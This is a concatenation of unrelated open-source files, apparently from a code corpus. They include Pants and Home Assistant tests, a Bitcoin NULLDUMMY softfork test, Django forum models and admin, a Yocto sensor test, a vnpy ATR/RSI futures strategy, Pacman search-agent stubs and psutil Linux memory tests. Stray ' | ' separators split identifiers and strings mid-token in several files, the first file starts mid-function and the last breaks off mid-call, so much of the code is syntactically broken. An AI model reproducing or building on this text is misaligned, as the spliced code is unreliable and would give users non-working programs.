handle = run_pants_with_workdir_without_waiting(
command, workdir=workdir, hermetic=hermetic, use_pantsd=use_pantsd, **kwargs
)
return handle.join(stdin_data=stdin_data, tee_output=tee_output)
def run_pants(
command: Command,
*,
hermetic: bool = True,
use_pantsd: bool = True,
config: Mapping | None = None,
extra_env: Mapping[str, str] | None = None,
stdin_data: bytes | str | None = None,
**kwargs: Any,
) -> PantsResult:
"""Runs Pants in a subprocess.
:param command: A list of command line arguments coming after `./pants`.
:param hermetic: If hermetic, your actual `pants.toml` will not be used.
:param use_pantsd: If True, the Pants process will use pantsd.
:param config: Optional data for a generated TOML file. A map of <section-name> ->
map of key -> value.
:param extra_env: Set these env vars in the Pants process's environment.
:param stdin_data: Make this data available to be read from the process's stdin.
:param kwargs: Extra keyword args to pass to `subprocess.Popen`.
"""
with temporary_workdir() as workdir:
return run_pants_with_workdir(
command,
workdir=workdir,
hermetic=hermetic,
use_pantsd=use_pantsd,
config=config,
|
guncoin/guncoin | test/functional/feature_nulldummy.py | Python | mit | 6,442 | 0.00652 | #!/usr/bin/env python3
# Copyright (c) 2016-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test NULLDUMMY softfork.
Connect to a single node.
Generate 2 blocks (save the coinbases for later).
Generate 427 more blocks.
[Policy/Consensus] Check that NULLDUMMY compliant transactions are accepted in the 430th block.
[Policy] Check that non-NULLDUMMY transactions are rejected before activation.
[Consensus] Check that the new NULLDUMMY rules are not enforced on the 431st block.
[Policy/Consensus] Check that the new NULLDUMMY rules are enforced on the 432nd block.
"""
from test_framework.blocktools import create_coinbase, create_block, create_transaction, add_witness_commitment
from test_framework.messages import CTransaction
from test_framework.script import CScript
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, bytes_to_hex_str
import time
NULLDUMMY_ERROR = "non-mandatory-script-verify-flag (Dummy CHECKMULTISIG argument must be zero) (code 64)"
def trueDummy(tx):
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
assert(len(i) == 0)
newscript.append(b'\x51')
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
tx.rehash()
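# Background note (added for clarity, not part of the original test):
# OP_CHECKMULTISIG pops one extra, unused stack element, and the NULLDUMMY rule
# requires that element to be the empty vector.  trueDummy() above rewrites the
# leading empty push of the scriptSig into a push of b'\x51' (a non-empty,
# "true" dummy), e.g.
#
#   scriptSig: <> <sig>        # empty dummy element, NULLDUMMY-compliant
#   scriptSig: <0x51> <sig>    # non-empty dummy after trueDummy(), rejected
#                              # once NULLDUMMY is enforced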
class NULLDUMMYTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
# This script tests NULLDUMMY activation, which is part of the 'segwit' deployment, so we go through
# normal segwit activation here (and don't use the default always-on behaviour).
self.extra_args = [['-whitelist=127.0.0.1', '-vbparams=segwit:0:999999999999', '-addresstype=legacy', "-deprecatedrpc=addwitnessaddress"]]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.address = self.nodes[0].getnewaddress()
self.ms_address = self.nodes[0].addmultisigaddress(1, [self.address])['address']
self.wit_address = self.nodes[0].addwitnessaddress(self.address)
self.wit_ms_address = self.nodes[0].addmultisigaddress(1, [self.address], '', 'p2sh-segwit')['address']
self.coinbase_blocks = self.nodes[0].generate(2) # Block 2
coinbase_txid = []
for i in self.coinbase_blocks:
coinbase_txid.append(self.nodes[0].getblock(i)['tx'][0])
self.nodes[0].generate(427) # Block 429
self.lastblockhash = self.nodes[0].getbestblockhash()
self.tip = int("0x" + self.lastblockhash, 0)
self.lastblockheight = 429
self.lastblocktime = int(time.time()) + 429
self.log.info("Test 1: NULLDUMMY compliant base transactions should be accepted to mempool and mined before activation [430]")
test1txs = [create_transaction(self.nodes[0], coinbase_txid[0], self.ms_address, amount=49)]
txid1 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[0].serialize_with_witness()), True)
test1txs.append(create_transaction(self.nodes[0], txid1, self.ms_address, amount=48))
txid2 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[1].serialize_with_witness()), True)
test1txs.append(create_transaction(self.nodes[0], coinbase_txid[1], self.wit_ms_address, amount=49))
txid3 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[2].serialize_with_witness()), True)
self.block_submit(self.nodes[0], test1txs, False, True)
self.log.info("Test 2: Non-NULLDUMMY base multisig transaction should not be accepted to mempool before activati | on")
test2tx = create_transaction(self.nodes[0], txid2, self.ms_address, amount=47)
trueDummy(test2tx)
| assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test2tx.serialize_with_witness()), True)
self.log.info("Test 3: Non-NULLDUMMY base transactions should be accepted in a block before activation [431]")
self.block_submit(self.nodes[0], [test2tx], False, True)
self.log.info("Test 4: Non-NULLDUMMY base multisig transaction is invalid after activation")
test4tx = create_transaction(self.nodes[0], test2tx.hash, self.address, amount=46)
test6txs=[CTransaction(test4tx)]
trueDummy(test4tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test4tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test4tx])
self.log.info("Test 5: Non-NULLDUMMY P2WSH multisig transaction invalid after activation")
test5tx = create_transaction(self.nodes[0], txid3, self.wit_address, amount=48)
test6txs.append(CTransaction(test5tx))
test5tx.wit.vtxinwit[0].scriptWitness.stack[0] = b'\x01'
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test5tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test5tx], True)
self.log.info("Test 6: NULLDUMMY compliant base/witness transactions should be accepted to mempool and in block after activation [432]")
for i in test6txs:
self.nodes[0].sendrawtransaction(bytes_to_hex_str(i.serialize_with_witness()), True)
self.block_submit(self.nodes[0], test6txs, True, True)
def block_submit(self, node, txs, witness = False, accept = False):
block = create_block(self.tip, create_coinbase(self.lastblockheight + 1), self.lastblocktime + 1)
block.nVersion = 4
for tx in txs:
tx.rehash()
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
witness and add_witness_commitment(block)
block.rehash()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
if (accept):
assert_equal(node.getbestblockhash(), block.hash)
self.tip = block.sha256
self.lastblockhash = block.hash
self.lastblocktime += 1
self.lastblockheight += 1
else:
assert_equal(node.getbestblockhash(), self.lastblockhash)
if __name__ == '__main__':
NULLDUMMYTest().main()
|
neosergio/hackatonqr | vote/models.py | Python | gpl-2.0 | 312 | 0.019231 | #-*- coding:utf-8 -*-
from django.db import models
# Create your models here.
class Candidate(models.Model):
name = models.CharField(max_length=250, verbose_name="Nombre de candid | ato")
votes = models.IntegerField(verbose_name="Cantidad de votos")
def __unicode__(self):
return | self.name + str(self.votes)
|
justyns/home-assistant | tests/components/test_weblink.py | Python | mit | 1,040 | 0 | """The tests for the weblink component."""
import unittest
from homeassistant.components import weblink
from tests.common import get_test_home_assistant
class TestComponentWeblink(unittest.TestCase) | :
"""Test the Weblink component."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self):
"""Stop everything tha | t was started."""
self.hass.stop()
def test_entities_get_created(self):
"""Test if new entity is created."""
self.assertTrue(weblink.setup(self.hass, {
weblink.DOMAIN: {
'entities': [
{
weblink.ATTR_NAME: 'My router',
weblink.ATTR_URL: 'http://127.0.0.1/'
},
{}
]
}
}))
state = self.hass.states.get('weblink.my_router')
assert state is not None
assert state.state == 'http://127.0.0.1/'
|
zhu327/forum | forum/admin.py | Python | mit | 1,293 | 0.001547 | # coding=utf-8
from django.contrib import admin
from forum.models import ForumUser, Plane, Node, Topic, Reply, Favorite, Notification, Transaction, Vote
class ForumUserAdmin(admin.ModelAdmin):
list_display = ('username', 'email', 'is_active', 'is_staff', 'date_joined')
search_fields = ('username', 'email', 'nickname')
list_filter = ('is_active', 'is_staff', 'date_joined')
class PlaneAdmin(admin.ModelAdmin):
list_display = ('name', 'created')
search_fields = ('name',)
list_filter = ('created',)
class NodeAdmin(admin.ModelAdmin):
list_display = ('name', 'slug', 'created')
| search_fields = ('name',)
list_filter = ('created',)
class TopicAdmin(admin.ModelAdmin):
list_display = ('title', 'created')
search_fields = ('title', 'content')
list_filter = ('created',)
class ReplyAdmin(admin.ModelAdmin):
list_display = ('content', 'created')
search_fields = ('content',)
list_filter = ('created',)
admin.site.register(ForumUser, ForumUserAdmin)
admin.site.regi | ster(Plane, PlaneAdmin)
admin.site.register(Node, NodeAdmin)
admin.site.register(Topic, TopicAdmin)
admin.site.register(Reply, ReplyAdmin)
admin.site.register(Favorite)
admin.site.register(Notification)
admin.site.register(Transaction)
admin.site.register(Vote)
|
wanghongjuan/meta-iotqa-1 | lib/oeqa/runtime/sensor/test_accel_bma222e.py | Python | mit | 2,499 | 0.008003 | """
@file test_accel_bma222e.py
"""
##
# @addtogroup soletta sensor
# @brief This is a sensor test based on a Soletta app
# @brief Tests the bma222e sensor on Galileo/MinnowMax
##
import os
import time
from oeqa.utils.helper import shell_cmd
from oeqa.oetest import oeRuntimeTest
from oeqa.runtime.sensor.EnvirSetup import EnvirSetup
from oeqa.utils.decorators import tag
@tag(TestType="FVT", FeatureID="IOTOS-757")
class TestAccelBMA222E(oeRuntimeTest):
"""
@class TestAccelBMA222E
"""
def setUp(self):
'''Generate test app on target
@fn setUp
@param self
@return'''
print ('start!\n')
#connect sensor and DUT through board
#shell_cmd("sudo python "+ os.path.dirname(__file__) + "/Connector.py bma222e")
envir = EnvirSetup(self.target)
envir.envirSetup("bma222e","accel")
def tearDown(self):
'''unload bma222e driver
@fn tearDown
@param self
@return'''
(status, output) = self.target.run("cat /sys/devices/virtual/dmi/id/board_name")
if "Minnow" in output:
(status, output) = self.target.run(
"cd /sy | s/bus/i2c/devices; \
echo 0x19 >i2c-1/delete_device")
elif "Galileo" in output or "SDS" in output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x19 >i2c-0/delete_device")
def test_Accel_BMA222E(self):
'''Execute the test app and verify sensor data
@fn test_Accel_BMA222E
@param self
@return'''
print ('start reading d | ata!')
(status, output) = self.target.run(
"chmod 777 /opt/apps/test_accel_bma222e.fbp")
(status, output) = self.target.run(
"cd /opt/apps; ./test_accel_bma222e.fbp >re.log")
error = output
#check whether data collected
(status, output) = self.target.run(
"cp /opt/apps/re.log /home/root/bma222e.log")
(status, output) = self.target.run("cat /opt/apps/re.log|grep direction-vector")
print (output + "\n")
self.assertEqual(status, 0, msg="Error messages: %s" % error)
#make sure sensor data is valid
(status, output) = self.target.run("cat /opt/apps/re.log|grep '0.000000, 0.000000, 0.000000'")
self.assertEqual(status, 1, msg="Error messages: %s" % output)
|
benjyw/pants | src/python/pants/base/exiter_integration_test.py | Python | apache-2.0 | 1,213 | 0.003303 | # Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE). |
import os
from pants.testutil.pants_integration_test import ensure_daemon, run_pants, setup_tmpdir
dir_layout = {
# This file is expected to fail to "compile" when run via `./pants run` due to a SyntaxError.
    # Because the error itself contains unicode, it exercises whether the error-handling codepaths
    # are unicode-aware.
os.path.join(
"exiter_integration_test_harness", "main.py"
): " | if __name__ == '__main__':\n import sys¡",
os.path.join(
"exiter_integration_test_harness", "BUILD"
): "python_library()\npex_binary(name='bin', entry_point='main.py')",
}
@ensure_daemon
def test_unicode_containing_exception(use_pantsd: bool) -> None:
with setup_tmpdir(dir_layout) as tmpdir:
pants_run = run_pants(
[
"--backend-packages=pants.backend.python",
"run",
os.path.join(tmpdir, "exiter_integration_test_harness", "main.py"),
],
use_pantsd=use_pantsd,
)
pants_run.assert_failure()
assert "import sys¡" in pants_run.stderr
|
lukesummer/vnpy | vn.trader/ctaAlgo/strategyAtrRsi.py | Python | mit | 9,927 | 0.004494 | # encoding: UTF-8
"""
A trading strategy that combines the ATR and RSI indicators, suitable for 1-minute and 5-minute bars on stock index futures.
Notes:
1. The author makes no guarantee of trading profits; the strategy code is for reference only.
2. This strategy requires talib; users who have not installed it should first follow the tutorial on www.vnpy.org.
3. After importing IF0000_1min.csv into MongoDB with ctaHistoryData.py, run this file directly to backtest the strategy.
"""
from ctaBase import *
from ctaTemplate import CtaTemplate
import talib
import numpy as np
########################################################################
class AtrRsiStrategy(CtaTemplate):
"""结合ATR和RSI指标的一个分钟线交易策略"""
className = 'AtrRsiStrategy'
author = u'用Python的交易员'
    # Strategy parameters
    atrLength = 22 # window size for computing the ATR indicator
    atrMaLength = 10 # window size for the moving average of ATR
    rsiLength = 5 # window size for computing RSI
    rsiEntry = 16 # RSI entry signal offset
    trailingPercent = 0.8 # trailing stop, in percent
    initDays = 10 # number of days of data used for initialization
    # Strategy variables
    bar = None # current bar (K-line) object
    barMinute = EMPTY_STRING # minute of the current bar
    bufferSize = 100 # number of bars to keep buffered
    bufferCount = 0 # number of bars buffered so far
    highArray = np.zeros(bufferSize) # array of bar highs
    lowAr | ray = np.zeros(bufferSize) # array of bar lows
    closeArray = np.zeros(bufferSize) # array of bar closes
    atrCount = 0 # number of ATR values buffered so far
    atrArray = np.z | eros(bufferSize) # array of ATR values
    atrValue = 0 # latest ATR value
    atrMa = 0 # moving average of ATR
    rsiValue = 0 # latest RSI value
    rsiBuy = 0 # RSI threshold for opening longs
    rsiSell = 0 # RSI threshold for opening shorts
    intraTradeHigh = 0 # highest price while in a trade, used for the trailing stop
    intraTradeLow = 0 # lowest price while in a trade, used for the trailing stop
    orderList = [] # list of issued order IDs
    # Parameter list, holding the names of the parameters
paramList = ['name',
'className',
'author',
'vtSymbol',
'atrLength',
'atrMaLength',
'rsiLength',
'rsiEntry',
'trailingPercent']
    # Variable list, holding the names of the variables
varList = ['inited',
'trading',
'pos',
'atrValue',
'atrMa',
'rsiValue',
'rsiBuy',
'rsiSell']
#----------------------------------------------------------------------
def __init__(self, ctaEngine, setting):
"""Constructor"""
super(AtrRsiStrategy, self).__init__(ctaEngine, setting)
#----------------------------------------------------------------------
def onInit(self):
"""初始化策略(必须由用户继承实现)"""
self.writeCtaLog(u'%s策略初始化' %self.name)
        # Initialize the RSI entry thresholds
self.rsiBuy = 50 + self.rsiEntry
self.rsiSell = 50 - self.rsiEntry
        # Load historical data and initialize strategy values by replaying it
initData = self.loadBar(self.initDays)
for bar in initData:
self.onBar(bar)
self.putEvent()
#----------------------------------------------------------------------
def onStart(self):
"""启动策略(必须由用户继承实现)"""
self.writeCtaLog(u'%s策略启动' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onStop(self):
"""停止策略(必须由用户继承实现)"""
self.writeCtaLog(u'%s策略停止' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onTick(self, tick):
"""收到行情TICK推送(必须由用户继承实现)"""
# 计算K线
tickMinute = tick.datetime.minute
if tickMinute != self.barMinute:
if self.bar:
self.onBar(self.bar)
bar = CtaBarData()
bar.vtSymbol = tick.vtSymbol
bar.symbol = tick.symbol
bar.exchange = tick.exchange
bar.open = tick.lastPrice
bar.high = tick.lastPrice
bar.low = tick.lastPrice
bar.close = tick.lastPrice
bar.date = tick.date
bar.time = tick.time
            bar.datetime = tick.datetime # the bar's time is that of its first tick
            self.bar = bar # direct reference to avoid an extra attribute lookup
            self.barMinute = tickMinute # update the current minute
        else: # otherwise keep accumulating the current bar
            bar = self.bar # again, a local reference for speed
bar.high = max(bar.high, tick.lastPrice)
bar.low = min(bar.low, tick.lastPrice)
bar.close = tick.lastPrice
#----------------------------------------------------------------------
def onBar(self, bar):
"""收到Bar推送(必须由用户继承实现)"""
# 撤销之前发出的尚未成交的委托(包括限价单和停止单)
for orderID in self.orderList:
self.cancelOrder(orderID)
self.orderList = []
        # Store the bar data
self.closeArray[0:self.bufferSize-1] = self.closeArray[1:self.bufferSize]
self.highArray[0:self.bufferSize-1] = self.highArray[1:self.bufferSize]
self.lowArray[0:self.bufferSize-1] = self.lowArray[1:self.bufferSize]
self.closeArray[-1] = bar.close
self.highArray[-1] = bar.high
self.lowArray[-1] = bar.low
self.bufferCount += 1
if self.bufferCount < self.bufferSize:
return
        # Compute the indicator values
self.atrValue = talib.ATR(self.highArray,
self.lowArray,
self.closeArray,
self.atrLength)[-1]
self.atrArray[0:self.bufferSize-1] = self.atrArray[1:self.bufferSize]
self.atrArray[-1] = self.atrValue
self.atrCount += 1
if self.atrCount < self.bufferSize:
return
self.atrMa = talib.MA(self.atrArray,
self.atrMaLength)[-1]
self.rsiValue = talib.RSI(self.closeArray,
self.rsiLength)[-1]
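        # Background (added note, not part of the original strategy): talib.ATR
        # is a smoothed average of the true range
        #     TR = max(high - low, |high - prev_close|, |low - prev_close|)
        # over atrLength bars, and talib.RSI = 100 - 100 / (1 + RS), where RS is
        # the ratio of average gains to average losses over rsiLength bars; so
        # readings above 50 + rsiEntry (or below 50 - rsiEntry) are treated as
        # momentum strong enough to open a position.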
        # Decide whether to trade
        # Currently flat (no position)
        if self.pos == 0:
            self.intraTradeHigh = bar.high
            self.intraTradeLow = bar.low
            # ATR rising above its moving average means short-term volatility is increasing,
            # i.e. a trend is more likely, which is a suitable time for a CTA entry
            if self.atrValue > self.atrMa:
                # In a trend the RSI saturates in the overbought/oversold zone, which is used as the entry signal
                if self.rsiValue > self.rsiBuy:
                    # To help ensure a fill, the order is placed 5 index points through the market
self.buy(bar.close+5, 1)
return
if self.rsiValue < self.rsiSell:
self.short(bar.close-5, 1)
return
        # Holding a long position
        if self.pos == 1:
            # Track the highest price during the long trade and reset the lowest price
            self.intraTradeHigh = max(self.intraTradeHigh, bar.high)
            self.intraTradeLow = bar.low
            # Compute the trailing stop for the long position
            longStop = self.intraTradeHigh * (1-self.trailingPercent/100)
            # Place a local stop order and record its ID so it can be cancelled later
            orderID = self.sell(longStop, 1, stop=True)
            self.orderList.append(orderID)
            return
        # Holding a short position
if self.pos == -1:
self.intraTradeLow = min(self.intraTradeLow, bar.low)
self.intraTradeHigh = bar.high
shortStop = self.intraTradeLow * (1+self.trailingPercent/100)
orderID = self.cover(shortStop, 1, stop=True)
self.orderList.append(orderID)
return
        # Emit a status update event
self.putEvent()
#----------------------------------------------------------------------
def onOrder(self, order):
"""收到委托变化推送(必须由用户继承实现)"""
pass
#----------------------------------------------------------------------
def onTrade(self, trade):
        """Callback for trade (fill) updates (must be implemented by the user's subclass)"""
        pass
if __name__ == '__main__':
    # Allows the backtest to be run by double-clicking this file directly
    # PyQt4 is imported to make sure matplotlib uses PyQt4 rather than PySide, preventing an initialization error
    from ctaBacktesting import *
    from PyQt4 import QtCore, QtGui
    # Create the backtesting engine
    engine = BacktestingEngine()
    # Set the engine's backtesting mode to bar data
    engine.setBacktestingMode(engine.BAR_MODE)
    # Set the start date of the backtest data
    engine.setStartDate('20120101')
    # Load historical data into the engine
    engine.loadHistoryData(MINUTE_DB_NAME, 'IF0000')
    # Set product-related parameters
    engine.setSlippage(0.2) # one tick for stock index futures
    engine.setRate(0.3/10000) # commission of 0.3 per 10,000 (0.003%)
    engine.setSize(300) # contract multiplier for stock index futures
    # Create the strategy object inside the engine
    engine.initStrategy(AtrRsiStrategy, {})
    # Start the backtest
    engine.runBacktesting()
engine.runBacktesting()
|
sumitb/cse537 | multiagent/multiAgents.py | Python | gpl-2.0 | 7,379 | 0.006234 | # multiAgents.py
# --------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to
# http://inst.eecs.berkeley.edu/~cs188/pacman/pacman.html
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
from util import manhattanDistance
from game import Directions
import random, util
from game import Agent
class ReflexAgent(Agent):
"""
A reflex agent chooses an action at each choice point by examining
its alternatives via a state evaluation function.
The code below is provided as a guide. You are welcome to change
it in any way you see fit, so long as you don't touch our method
headers.
"""
def getAction(self, gameState):
"""
You do not need to change this method, but you're welcome to.
getAction chooses among the best options according to the evaluation function.
Just like in the previous project, getAction takes a GameState and returns
some Directions.X for some X in the set {North, South, West, East, Stop}
"""
# Collect legal moves and successor states
legalMoves = gameState.getLegalActions()
# Choose one of the best actions
scores = [self.evaluationFunction(gameState, action) for action in legalMoves]
bestScore = max(scores)
bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]
chosenIndex = random.choice(bestIndices) # Pick randomly among the best
"Add more of your code here if you want to"
return legalMoves[chosenIndex]
def evaluationFunction(self, currentGameState, action):
"""
Design a better evaluation function here.
The evaluation function takes in the current and proposed successor
GameStates (pacman.py) and returns a number, where higher numbers are better.
The code below extracts some useful information from the state, like the
remaining food (newFood) and Pacman position after moving (newPos).
newScaredTimes holds the number of moves that each ghost will remain
scared because of Pacman having eaten a power pellet.
Print out these variables to see what you're getting, then combine them
to create a masterful evaluation function.
"""
# Useful information you can extract from a GameState (pacman.py)
successorGameState = currentGameState.generatePacmanSuccessor(action)
newPos = successorGameState.getPacmanPosition()
newFood = successorGameState.getFood()
newGhostStates = successorGameState.getGhostStates()
newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]
"*** YOUR CODE HERE ***"
ghost = str(newGhostStates[0])
ghost = ghost[ghost.find('=') + 1 : ghost.rfind(',')]
ghost = ghost.replace(".0", "")
#print newPos, newGhostStates[0]
if str(newPos) == ghost:
return -10
if newFood[newPos[0]][newPos[1]]:
return 3
if newScaredTimes[0] > 0:
return 10
return successorGameState.getScore()
def scoreEvaluationFunction(currentGameState):
"""
This default evaluation function just returns the score of the state.
The score is the same one displayed in the Pacman GUI.
This evaluation function is meant for use with adversarial search agents
(not reflex agents).
"""
return currentGameState.getScore()
class MultiAgentSearchAgent(Agent):
"""
This class provides some common elements to all of your
multi-agent searchers. Any methods defined here will be available
to the MinimaxPacmanAgent, AlphaBetaPacmanAgent & ExpectimaxPacmanAgent.
You *do not* need to make any changes here, but you can if you want to
add functionality to all your adversarial search agents. Please do not
remove anything, however.
Note: this is an abstract class: one that should not be instantiated. It's
only partially specified, and designed to be extended. Agent (game.py)
is another abstract class.
"""
def __init__(self, evalFn = 'scoreEvaluationFunction', depth = '2'):
self.index = 0 # Pacman is always agent index 0
self.evaluationFunction = util.lookup(evalFn, globals())
self.depth = int(depth)
class MinimaxAgent(MultiAgentSearchAgent) | :
"""
Your m | inimax agent (question 2)
"""
def getAction(self, gameState):
"""
Returns the minimax action from the current gameState using self.depth
and self.evaluationFunction.
Here are some method calls that might be useful when implementing minimax.
gameState.getLegalActions(agentIndex):
Returns a list of legal actions for an agent
agentIndex=0 means Pacman, ghosts are >= 1
gameState.generateSuccessor(agentIndex, action):
Returns the successor game state after an agent takes an action
gameState.getNumAgents():
Returns the total number of agents in the game
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
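        # Illustrative sketch only (the method is intentionally left
        # unimplemented above); it assumes the standard Berkeley Pacman
        # helpers gameState.isWin() / gameState.isLose() exist:
        #
        #   def value(state, agent, depth):
        #       if state.isWin() or state.isLose() or depth == self.depth:
        #           return self.evaluationFunction(state)
        #       next_agent = (agent + 1) % state.getNumAgents()
        #       next_depth = depth + 1 if next_agent == 0 else depth
        #       scores = [value(state.generateSuccessor(agent, a),
        #                       next_agent, next_depth)
        #                 for a in state.getLegalActions(agent)]
        #       return max(scores) if agent == 0 else min(scores)
        #
        # The returned action is the root move maximizing value(successor, 1, 0),
        # with agent 0 (Pacman) maximizing and every ghost minimizing.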
class AlphaBetaAgent(MultiAgentSearchAgent):
"""
Your minimax agent with alpha-beta pruning (question 3)
"""
def getAction(self, gameState):
"""
Returns the minimax action using self.depth and self.evaluationFunction
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
class ExpectimaxAgent(MultiAgentSearchAgent):
"""
Your expectimax agent (question 4)
"""
def getAction(self, gameState):
"""
Returns the expectimax action using self.depth and self.evaluationFunction
All ghosts should be modeled as choosing uniformly at random from their
legal moves.
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def betterEvaluationFunction(currentGameState):
"""
Your extreme ghost-hunting, pellet-nabbing, food-gobbling, unstoppable
evaluation function (question 5).
DESCRIPTION: <write something here so we know what you did>
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
# Abbreviation
better = betterEvaluationFunction
class ContestAgent(MultiAgentSearchAgent):
"""
Your agent for the mini-contest
"""
def getAction(self, gameState):
"""
Returns an action. You can use any method you want and search to any depth you want.
Just remember that the mini-contest is timed, so you have to trade off speed and computation.
Ghosts don't behave randomly anymore, but they aren't perfect either -- they'll usually
just make a beeline straight towards Pacman (or away from him if they're scared!)
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
|
0-wiz-0/psutil | psutil/tests/test_linux.py | Python | bsd-3-clause | 27,328 | 0.00022 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Linux specific tests."""
import contextlib
import errno
import io
import os
import pprint
import re
import shutil
import socket
import struct
import tempfile
import textwrap
import time
import warnings
try:
from unittest import mock # py3
except ImportError:
import mock # requires "pip install mock"
import psutil
from psutil import LINUX
from psutil._compat import PY3
from psutil._compat import u
from psutil.tests import call_until
from psutil.tests import get_kernel_version
from psutil.tests import importlib
from psutil.tests import MEMORY_TOLERANCE
from psutil.tests import pyrun
from psutil.tests import reap_children
from psutil.tests import retry_before_failing
from psutil.tests import run_test_module_by_name
from psutil.tests import sh
from psutil.tests import skip_on_not_implemented
from psutil.tests import TESTFN
from psutil.tests import TRAVIS
from psutil.tests import unittest
from psutil.tests import which
HERE = os.path.abspath(os.path.dirname(__file__))
SIOCGIFADDR = 0x8915
SIOCGIFCONF = 0x8912
SIOCGIFHWADDR = 0x8927
# =====================================================================
# utils
# =====================================================================
def get_ipv4_address(ifname):
import fcntl
ifname = ifname[:15]
if PY3:
ifname = bytes(ifname, 'ascii')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with contex | tlib.clo | sing(s):
return socket.inet_ntoa(
fcntl.ioctl(s.fileno(),
SIOCGIFADDR,
struct.pack('256s', ifname))[20:24])
def get_mac_address(ifname):
import fcntl
ifname = ifname[:15]
if PY3:
ifname = bytes(ifname, 'ascii')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with contextlib.closing(s):
info = fcntl.ioctl(
s.fileno(), SIOCGIFHWADDR, struct.pack('256s', ifname))
if PY3:
def ord(x):
return x
else:
import __builtin__
ord = __builtin__.ord
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
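# Usage sketch (illustrative, not part of the original tests): both helpers
# take a Linux interface name, e.g.
#
#   get_ipv4_address('eth0')   # -> e.g. '192.168.1.10'
#   get_mac_address('eth0')    # -> e.g. 'aa:bb:cc:dd:ee:ff'
#
# They issue the SIOCGIFADDR / SIOCGIFHWADDR ioctls on a throwaway UDP socket,
# which is why they are Linux-only.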
def free_swap():
"""Parse 'free' cmd and return swap memory's s total, used and free
values.
"""
lines = sh('free').split('\n')
for line in lines:
if line.startswith('Swap'):
_, total, used, free = line.split()
return (int(total) * 1024, int(used) * 1024, int(free) * 1024)
def free_physmem():
"""Parse 'free' cmd and return physical memory's total, used
and free values.
"""
lines = sh('free').split('\n')
for line in lines:
if line.startswith('Mem'):
total, used, free, shared, buffers, cached = \
[int(x) * 1024 for x in line.split()[1:]]
return (total, used, free, shared, buffers, cached)
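# For reference (illustrative values): these helpers expect the classic procps
# layout of the `free` command, e.g.
#
#                total       used       free     shared    buffers     cached
#   Mem:       8060436    5903460    2156976     432840     395192    2541064
#   Swap:      8267772          0    8267772
#
# free_physmem() parses the six numeric columns of the "Mem" line and
# free_swap() the three numeric columns of the "Swap" line, both in KiB,
# multiplying by 1024 to return bytes.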
# =====================================================================
# system memory
# =====================================================================
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemMemory(unittest.TestCase):
def test_vmem_total(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertEqual(total, psutil.virtual_memory().total)
@retry_before_failing()
def test_vmem_used(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertAlmostEqual(used, psutil.virtual_memory().used,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_free(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertAlmostEqual(free, psutil.virtual_memory().free,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_buffers(self):
buffers = int(sh('vmstat').split('\n')[2].split()[4]) * 1024
self.assertAlmostEqual(buffers, psutil.virtual_memory().buffers,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_cached(self):
cached = int(sh('vmstat').split('\n')[2].split()[5]) * 1024
self.assertAlmostEqual(cached, psutil.virtual_memory().cached,
delta=MEMORY_TOLERANCE)
def test_swapmem_total(self):
total, used, free = free_swap()
return self.assertAlmostEqual(total, psutil.swap_memory().total,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_swapmem_used(self):
total, used, free = free_swap()
return self.assertAlmostEqual(used, psutil.swap_memory().used,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_swapmem_free(self):
total, used, free = free_swap()
return self.assertAlmostEqual(free, psutil.swap_memory().free,
